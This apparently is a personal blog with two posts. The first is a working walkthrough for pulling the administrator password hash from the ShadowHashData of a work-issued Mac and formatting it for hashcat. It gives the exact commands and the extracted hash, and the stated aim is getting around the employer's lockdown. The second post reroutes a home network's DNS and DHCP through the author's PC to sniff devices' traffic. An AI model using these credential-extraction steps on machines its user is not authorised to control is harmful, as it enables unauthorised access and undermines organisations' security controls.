Extracting and cracking MacOSX SHA512 passwords

Long story short, I love my fiance though she may be somewhat lacking in the technical area. She’s got a work-issue laptop with a built-in “Administrator” account that has locked down parts of the machine we want access to. So how to get in?

A nice post on apple stackexchange here helped me understand how the password encryption works on the backend (it’s SHA512), as well as rip out a pretty plist file with the hashed password data and get it ready for cracking. From there I’ll use my favorite cracker hashcat to break the actual password.

I’ve already been able to create a sudo-able account on this machine (this I finagled some time back when one of the “tech support guys” was helping us out and he made a little mistake). Outside of the scope of this article, but if you don’t have a sudo locally you might be able to boot into single-user mode which will give you root by powering off your machine and holding down command+s as it boots back up.

Back to attacking the hash- what I need are the three essential parts of the SHA512 hash:
$ml$iterations(int)$salt(hex)$entropy(hex)

All of these are stored in the users’s ShadowHashData, so, I just sudo -i to get a root prompt and pull the ShadowHashData this way:

thebox:~ root# defaults read /var/db/dslocal/nodes/Default/users/administrator.plist ShadowHashData > hexcode

This returns a big hex chunk of data to hexcode which, with a bit of prodding, will give me all three magic bits needed to run a dictionary attack on the password:

(<62706c69 73743030 d101025f 10145341 4c544544 2d534841 3531322d 50424b44 4632d303 04050607 0857656e 74726f70 79547361 6c745a69 74657261 74696f6e 734f1080 3d912bed 387aab30 ad2ce4b4 c37aefa0 3d7dbee0 5ffd0c03 e279674f 60491429 d31303d3 67f1f644 12611459 08e35c41 a9cce934 d394e092 683928b5 b827859d 8b5c8c7f 772b2bc9 b8592987 bfc8b6b5 15476922 f6878ffc ced141b6 1118d173 38f2adc0 0bad4ddb 182b0977 8aeeed1e e4ed479e 8b79d38d 855b5d95 841cbdc4 4f10200a 20f6e408 ad8596ed 4243fc07 75e07d28 aacdd29d fa4ad3e6 3fb3dfd4 08ab0311 7b39080b 22293136 41c4e700 00000000 00010100 00000000 00000900 00000000 00000000 00000000 0000ea>)

First we strip that down to the useful parts using some cli manipulation:
cat hexcode | tr -dc 0-9a-f > trimmed

which gives us a file, trimmed, that looks like this:

62706c6973743030d101025f101453414c5445442d5348413531322d50424b444632d303040506070857656e74726f70795473616c745a697465726174696f6e734f10803d912bed387aab30ad2ce4b4c37aefa03d7dbee05ffd0c03e279674f60491429d31303d367f1f6441261145908e35c41a9cce934d394e092683928b5b827859d8b5c8c7f772b2bc9b8592987bfc8b6b515476922f6878ffcced141b61118d17338f2adc00bad4ddb182b09778aeeed1ee4ed479e8b79d38d855b5d95841cbdc44f10200a20f6e408ad8596ed4243fc0775e07d28aacdd29dfa4ad3e63fb3dfd408ab03117b39080b2229313641c4e700000000000001010000000000000009000000000000000000000000000000ea

next, we need to take that hex and turn it into incomprehensible binary.

The nuances of this and the next step escape me somewhat, as I’m not yet familiar enough with OSX and/or cryptographic schemes in general to understand the under-the-hood workings. I can only assume that the hexdump and it’s binary format are intrinsic to the process, and treat them as a black box. To get the binary version into a new file, hexbin:

xxd -r -p trimmed hexbin

Once you’ve got those bits, you can run another neat little OSX native command to make a human-readable plist:

plutil -convert xml1 hexbin -o admin.plist

And voila, finally getting something we can work with in admin.plist:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>SALTED-SHA512-PBKDF2</key>
<dict>
<key>entropy</key>
<data>
PZEr7Th6qzCtLOS0w3rvoD19vuBf/QwD4nlnT2BJFCnTEwPTZ/H2RBJhFFkI
41xBqczpNNOU4JJoOSi1uCeFnYtcjH93KyvJuFkph7/ItrUVR2ki9oeP/M7R
QbYRGNFzOPKtwAutTdsYKwl3iu7tHuTtR56LedONhVtdlYQcvcQ=

</data>
<key>iterations</key>
<integer>31545</integer>
<key>salt</key>
<data>
CiD25AithZbtQkP8B3XgfSiqzdKd+krT5j+z39QIqwM=
</data>
</dict>
</dict>
</plist>

With this we have an iteration integer, and, in base64 again, the entropy and salt values.

Remember, our end goal is to get a hashcat readable hash that I can let my machine run amok against with a password list of some sort. We’re here now:

$ml$31545$salt(hex)$entropy(hex)

salt in b64: CiD25AithZbtQkP8B3XgfSiqzdKd+krT5j+z39QIqwM=
entropy in b64: PZEr7Th6qzCtLOS0w3rvoD19vuBf/QwD4nlnT2BJFCnTEwPTZ/H2RBJhFFkI41xBqczpNNOU4JJoOSi1uCeFnYtcjH93KyvJuFkph7/ItrUVR2ki9oeP/M7RQbYRGNFzOPKtwAutTdsYKwl3iu7tHuTtR56LedONhVtdlYQcvcQ=

So, for our purposes we need to convert those b64 salt and entropy values out of b64 and into their original binary format. Furthermore, we need them in hex to be able to work with them.
Let’s quicken the pace and do it in a single command for each:
echo CiD25AithZbtQkP8B3XgfSiqzdKd+krT5j+z39QIqwM= | base64 -D | xxd -p | tr -d \\n > salthex
echo PZEr7Th6qzCtLOS0w3rvoD19vuBf/QwD4nlnT2BJFCnTEwPTZ/H2RBJhFFkI41xBqczpNNOU4JJoOSi1uCeFnYtcjH93KyvJuFkph7/ItrUVR2ki9oeP/M7RQbYRGNFzOPKtwAutTdsYKwl3iu7tHuTtR56LedONhVtdlYQcvcQ= | base64 -D | xxd -p | tr -d \\n > entropyhex

this gives me a salt hex of 0a20f6e408ad8596ed4243fc0775e07d28aacdd29dfa4ad3e63fb3dfd408ab03
this gives me and an entropy hex of 3d912bed387aab30ad2ce4b4c37aefa03d7dbee05ffd0c03e279674f60491429d31303d367f1f6441261145908e35c41a9cce934d394e092683928b5b827859d8b5c8c7f772b2bc9b8592987bfc8b6b515476922f6878ffcced141b61118d17338f2adc00bad4ddb182b09778aeeed1ee4ed479e8b79d38d855b5d95841cbdc4

Now I can complete my hash string:
$ml$31545$0a20f6e408ad8596ed4243fc0775e07d28aacdd29dfa4ad3e63fb3dfd408ab03$3d912bed387aab30ad2ce4b4c37aefa03d7dbee05ffd0c03e279674f60491429d31303d367f1f6441261145908e35c41a9cce934d394e092683928b5b827859d8b5c8c7f772b2bc9b8592987bfc8b6b515476922f6878ffcced141b61118d17338f2adc00bad4ddb182b09778aeeed1ee4ed479e8b79d38d855b5d95841cbdc4

I write this to a little file, let’s say “machash” and fire up hashcat, specifying hashtype 7100

Setting up a local DNS/DHCP Server on Windows 7… and accidentally bringing down your home network

Because, why not?

I want my network to ask my main box about DNS first, then fall back to the default. While writing this I discovered it will have awesome implications for virtualization an it is even rewarding when seeking vulnerabilities on all systems attached to your access point! So I’m including some fun around that here. Let’s do it.

After a bit of searching I found this promising looking, free, open-source DHCP and DNS server: http://sourceforge.net/projects/dhcp-dns-server/files/Dual DHCP DNS Server/ (I’m definitely checking out the source later, it’s in c++!). I’ve played with this bad-boy for about 30 mins and it’s a lot of fun, super simple to set up, and will be helpful for a variety of network screwing-around in the future.

After the install (I made mine a windows service, but feel free to do it your own way), we need to make some tweaks to an ini file that will control our server. I’ll let you set up your own routers to give your machine a static internal IP- to get Windows to follow suit just change the properties of your network adapter like so:

 


StaticIP

 

 

 

 

 

 

This tells our ethernet connection to check with my machine for DNS requests, and  solidifies our machine’s address on the local network at .147.

 

 

 

 

 

 

 

 

 

 

 

Before starting the service, I’ll make a few small changes in the DualServer.ini config file to add my now static internal IP under the [LISTEN_ON] section

Dual_Listen_On

 

 

 

 

 

 

 

 

And create a fake dns entry that routes back to my machine:

DNS_HOSTS

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Yea okay, so how is that any different than a hosts file? Well, I can now tell my entire network to route their DNS through me, and establish myself as the all knowing. Furthermore, I can learn a lot about what’s going on within my network if I disable DHCP entirely on my router and wireshark it to grab useful information on every device within my network. Kinda cool.

Disable_DHCP

 

 

 

 

 

 

 

 

 

 

 


packet_assault

It was after I disabled the DHCP function on my router and enabled it on my main box that things started to get interesting. Suddenly an ocean of data that I shouldn’t have been receiving was being routed to me. I haven’t done enough research into why this happened, or if it should have, but once I saw this I was gleeful to say the least. Not only my wired devices were affected, but both of the cell phones that were connected to my WiFi started spazzing out as well.

The icing on the cake, was the behavior I was actually looking for- My VM started ignoring my home router and barreling my PC with data. Was my machine under attack by my network, or had I just stumbled onto something interesting?

I almost immediately started looking for a way to harness this- and found that there’s a “Windows Server” feature called “Routing and Remote Access”. I read in more than one place that this isn’t possible under Windows 7, but then I stumbled acrosss A lot of people who said it was. Just one way to find out?

As it turns out, if you’re running Windows 7 Ultimate (as I am) you can actually turn your machine into a router by tweaking some registry values. More on this interesting development in my next post! Try not to break the internets.